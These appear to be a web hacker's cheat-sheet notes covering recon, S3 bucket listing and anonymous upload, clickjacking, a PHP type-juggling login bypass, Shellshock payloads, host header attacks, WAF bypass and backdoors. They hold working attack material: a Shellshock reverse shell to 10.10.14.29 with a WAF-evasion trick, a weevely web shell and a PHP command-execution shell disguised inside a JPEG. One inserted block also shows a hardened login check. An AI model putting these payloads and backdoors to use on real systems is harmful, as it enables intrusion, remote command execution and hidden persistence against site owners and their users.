Recon
- Enumerate Domains.
- Enumerate Subdomains: recon.sh + httpx, or Knockpy -w subdomains $domain.com.
- Enumerate Params: gau, waybackurls, paramspider and dirsearch.
- Enumerate ports of each subdomain: nmap.
- API KEYS: cat url.txt | grep ".js" | xargs -I@ sh -c 'python.exe SecretFinder.py -i @ -e -o cli' | tee apiKeys.txt
- Maltego + FOCA.
- Google Dorks.
- Frameworks, Languages, PaaS and Servers.
- Shodan to check CVE exposure.
Recon searching for:
Requests:
- setRequestHeader
- XMLHttpRequest
- $.ajax
- $.get
- $.post
- $.getJSON
- fetch(
- axios({
- Url = "http
FIREBASE:
firebaseio.com/.json
Cookies:
- set_cookie(
- base64
S3 Buckets:
- s3.amazonaws.com
- Read: aws s3 ls s3://domain --no-sign-request (if the bucket does not exist the response is: An error occurred (NoSuchBucket) when calling the ListObjectsV2 operation: The specified bucket does not exist)
- Upload: aws s3 cp poc.html s3://domain --no-sign-request (uploads poc.html to s3://domain)
- Bruteforce: cat subdomains.txt | xargs -I@ sh -c 'aws s3 ls s3://@ --no-sign-request' | grep -v 'An error occurred (NoSuchBucket) when calling the ListObjectsV2 operation: The specified bucket does not exist'
API Tokens:
- pk_live
- sk_live
- AIza
JWT
JSON Web Tokens cannot be tested in automated ways, so bugs are more likely to be found there.
Open Redirect
Use "Burp Search" for:
?redirection=
?redir=
?redireccion=
Clickjacking
List forms that change the password or email, or delete the account, via a GET request + submit input.
<iframe src="$url?email=hacker@attacker-website.com"></iframe>
Type Juggling
POST https://example.com/login.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded

usuario=admin&password[]=anything
Add [] to the password parameter.
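Why adding [] to the password parameter can bypass a PHP login, as an added example that is not part of these notes: a loosely compared check beside a hardened one, run against the request bodies above. Assumes PHP 7 and a constructed sample credential; the function names are hypothetical. Under PHP 7 only the password[] input passes the vulnerable check, and the hardened check rejects it.

```php
<?php
// Added example, not from the original notes. Demonstrates the PHP
// "password[]" type-juggling bypass and a hardened check.
// Assumes PHP 7.x: strcmp() called with an array emits a warning and
// returns NULL, and NULL == 0 is true under loose comparison.
// (PHP 8 throws a TypeError instead, so this bypass does not apply.)

// Constructed sample credentials for the demo.
const STORED_PLAINTEXT = 'correct horse';   // legacy plaintext store
$storedHash = password_hash(STORED_PLAINTEXT, PASSWORD_DEFAULT);

// Vulnerable: loose comparison on a value whose type is never checked.
function login_vulnerable($password): bool
{
    // When $password is an array, strcmp() returns NULL and NULL == 0
    // evaluates to true, so login succeeds without the real password.
    return @strcmp($password, STORED_PLAINTEXT) == 0;
}

// Hardened: enforce the type, then verify against a proper hash.
function login_hardened($password, string $storedHash): bool
{
    if (!is_string($password)) {
        return false;   // reject arrays and objects outright
    }
    return password_verify($password, $storedHash);
}

// Simulate the request bodies from the notes:
//   password=anything   -> PHP hands the handler a string
//   password[]=anything -> PHP parses [] and hands it an array
$inputs = [
    'password=anything'   => 'anything',
    'password[]=anything' => ['anything'],
    'real password'       => STORED_PLAINTEXT,
];

foreach ($inputs as $label => $value) {
    printf("%-20s vulnerable=%s hardened=%s\n",
        $label,
        login_vulnerable($value) ? 'PASS' : 'fail',
        login_hardened($value, $storedHash) ? 'PASS' : 'fail');
}
```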
Shellshock Attack
cgi-bin/stats
POST https://example.com/session.cgi HTTP/1.1
Accept: */*
User-Agent: () { :; }; echo "pwned"
curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/
curl -s -X GET "http://localhost/cgi-bin/stats" -H "User-Agent: () { :; }; echo; /bin/bash -i >& /dev/tcp/10.10.14.29/443 0>&1"
The leading echo; is used to bypass the WAF.
CRLF
Always test params with GET Requests: https://github.com/AngelJuanMa/Web-Vulnerabilities/blob/main/Payloads/CRLF.txt
Google Dorks
python3.9 pagodo.py -d example.com -g ./dorks/all_google_dorks.txt
cat pagodo.py.log | grep 'Found unique URL #'
Takes about 4.2 days to finish.
Host Header Attack
POST https://example.com/reset.php HTTP/1.1
Accept: */*
Content-Type: application/json
Host: SUBDOMAIN.burpcollaborator.net
Subdomain Takeover
https://github.com/EdOverflow/can-i-take-over-xyz
API keys
https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/keyhacks-api.md
GraphQL
InQL Burp Suite extension to list endpoints.
WAF bypass
sudo apt install jq
git clone https://github.com/vincentcox/bypass-firewalls-by-DNS-history
cd bypass-firewalls-by-DNS-history/
bash bypass-firewalls-by-DNS-history.sh --help
https://github.com/EnableSecurity/wafw00f
Backdoor
weevely generate 12345 404.php
weevely http://domain.com/404.php 12345
jhead -purejpg ns.jpg
jhead -ce ns.jpg
mv ns.jpg ns.php.jpg
Insert:
<style>body{font-size: 0;}h1{font-size: 12px}</style><h1>
<?php if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);}else{echo '<img src="foto.jpg" border=0>
';}__halt_compiler();?></h1>
:wq